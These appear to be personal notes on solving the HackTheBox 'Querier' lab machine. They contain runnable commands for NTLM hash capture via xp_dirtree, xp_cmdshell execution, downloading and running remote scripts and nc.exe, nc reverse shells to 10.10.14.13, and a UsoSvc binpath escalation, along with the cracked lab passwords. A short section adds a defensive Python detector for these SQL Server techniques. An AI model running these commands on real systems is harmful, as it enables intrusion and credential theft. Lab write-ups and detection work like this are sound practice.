SQL server and SMB
Start responder to try to catch the NTLM Hash
Check SMB > get XLSM file
Open it with Visual Basic and get a password and the author of the file:
luis:PcwTWTHRwryjc$c6
luis didn’t work. What did he do?
He used binwalk:
binwalk "Currency Volume Report.xlsm"
What else can it do?
binwalk --help
We wanna extract the files inside:
binwalk -e "Currency Volume Report.xlsm"
cat the bin:
He ended up getting the same thing. What I missed:
“Uid” was the username, not luis.
It didn't let me log in. How he did it: connect to MSSQL using mssqlclient.py
mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
We want to try to get a shell. Since it’s disabled, we can force pull hashes. How?
Make sure Responder is running and:
exec xp_dirtree '\\10.10.14.13\share\',1,1
Responder will pull a hash
Cracked password:
corporate568
metasploit?
search psexec
use exploit/windows/smb/psexec #search result numbers change between versions, so use the full module path instead of "use 4"
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 10.10.10.125
set smbdomain QUERIER
set smbuser mssql-svc
set smbpass corporate568
options #to review everything
show targets
psexec.py:
psexec.py QUERIER/mssql-svc:'corporate568'@10.10.10.125
No admin access.
Redo the steps with the new credentials!
mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-auth
We can get a shell now.
We got systeminfo. Run it through WES:
CD there:
cd /opt/
./windows-exploit-suggester.py --database 2024-04-09-mssb.xls --systeminfo /home/kali/Desktop/HackTheBox/Querier/systeminfo.txt -o "Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763"
nothing. Send over PowerUp?
certutil -urlcache -f http://10.10.14.13/PowerUp.ps1 PowerUp.ps1
We have impersonate priv:
xp_cmdshell 'powershell.exe -nop -w hidden -e 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'
- needs to be without quotes
- too long
Try Metasploit with the one that worked?
xp_cmdshell powershell.exe -nop -w hidden -e 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
woooo it worked!!
get meterpreter session 1:
sessions 1
Get info:
getuid
sysinfo
getprivs
Run meterpreter suggester:
run post/multi/recon/local_exploit_suggester
Vulnerable to a familiar one:
[+] 10.10.10.125 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
Use reflection:
background
#didn't work
Check tokens that we can impersonate:
load incognito
list_tokens -u
None
Test the rest of the exploits metasploit suggester gave:
use exploit/windows/local/cve_2021_40449
^this worked
if none worked, I could've gone the manual route with nc.exe + msfvenom shell
session 2
getuid
shell
Get flags
$$$$$$$$$$$$$$$WHAT I DID WRONG$$$$$$$$$$$$$$$$$$$
I didn’t notice Uid (username) and tried the wrong username
when things didn't work out, I didn't go back and try the new credentials for direct access (mssqlclient)
I needed to fix syntax (quotes/no quotes) in the xp_cmdshell
Forgot to just try getsystem when I got a meterpreter shell (it would have worked)
####################WHAT HE DID##################
try my own shell:
send over nc.exe:
How to copy nc to folder:
cp /home/kali/nc.exe /home/kali/transfer
xp_cmdshell powershell Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"
What he did:
He made his own shell
xp_cmdshell 'powershell Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"'
xp_cmdshell powershell -c Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"
connect back:
Open listener:
nc -nvlp 4444
connect:
xp_cmdshell C:\Reports\nc.exe 10.10.14.13 4444 -e cmd.exe
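From the blue-team side, the xp_dirtree forced-auth trick above and the xp_cmdshell / nc.exe steps are all visible in SQL Server audit or Extended Events captures of executed statements. This is an added example (not from the write-up) of a small detector over constructed sample statements in a simplified "login|statement" form; the format and the sample values are assumptions, not real audit output.

```python
import re

# Constructed sample statements in a simplified "login|statement" form; they are
# not real SQL Server audit output, just what a SQL Audit or Extended Events
# capture of the steps in these notes would contain.
SAMPLE_EVENTS = [
    "reporting|SELECT name FROM sys.databases",
    r"reporting|exec xp_dirtree '\\10.10.14.13\share\',1,1",
    "mssql-svc|EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "mssql-svc|xp_cmdshell 'powershell.exe -nop -w hidden -e SQBFAFgA'",
    r"mssql-svc|xp_cmdshell C:\Reports\nc.exe 10.10.14.13 4444 -e cmd.exe",
    "app|SELECT SUM(volume) FROM trades WHERE day = '2019-01-01'",
]

# A UNC path argument (\\host\share) to a file-system proc makes the server
# authenticate outbound with its service account: that is the forced-auth step.
UNC_PATH = re.compile(r"\\\\[\w.\-]+\\")
FS_PROCS = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.I)
ENABLE_CMDSHELL = re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)
EXEC_CMDSHELL = re.compile(r"^\s*(exec(ute)?\s+)?xp_cmdshell\b", re.I)
ENCODED_PS = re.compile(
    r"powershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I)

def classify(statement):
    """Return the detection names that fire on one T-SQL statement."""
    hits = []
    if FS_PROCS.search(statement) and UNC_PATH.search(statement):
        hits.append("forced-auth-unc")
    if ENABLE_CMDSHELL.search(statement):
        hits.append("xp_cmdshell-enabled")   # xp_cmdshell is off by default
    if EXEC_CMDSHELL.search(statement):
        hits.append("xp_cmdshell-exec")
        if ENCODED_PS.search(statement):
            hits.append("encoded-powershell")
    return hits

def scan(events):
    """Map each event line to (login, hits), keeping only lines that fired."""
    findings = []
    for line in events:
        login, statement = line.split("|", 1)
        hits = classify(statement)
        if hits:
            findings.append((login, hits))
    return findings

if __name__ == "__main__":
    for login, hits in scan(SAMPLE_EVENTS):
        print(f"{login}: {', '.join(hits)}")
```

Any hit from a low-privilege login such as the reporting account is worth an alert on its own; blocking outbound SMB from the database host removes the forced-auth path entirely.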
Host PowerUp or Sherlock with the auto run added to the end of them and run the echo command:
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:80/Sherlock.ps1') | powershell -noprofile -
It found UsoSvc
what is it?
sc qc UsoSvc
You can edit the binary path
Method 1:
Using the abuse method from PowerUp:
Invoke-ServiceUserAdd
Method 2:
editing the binary:
sc config UsoSvc binpath= "C:\Reports\nc.exe 10.10.14.13 5555 -e cmd.exe"
Needs a different port than the one we’re currently connected on
Double check that it got edited:
sc qc UsoSvc
open nc listener:
nc -nvlp 5555
stop and start:
sc stop UsoSvc & sc start UsoSvc
Note: This also had GPP pass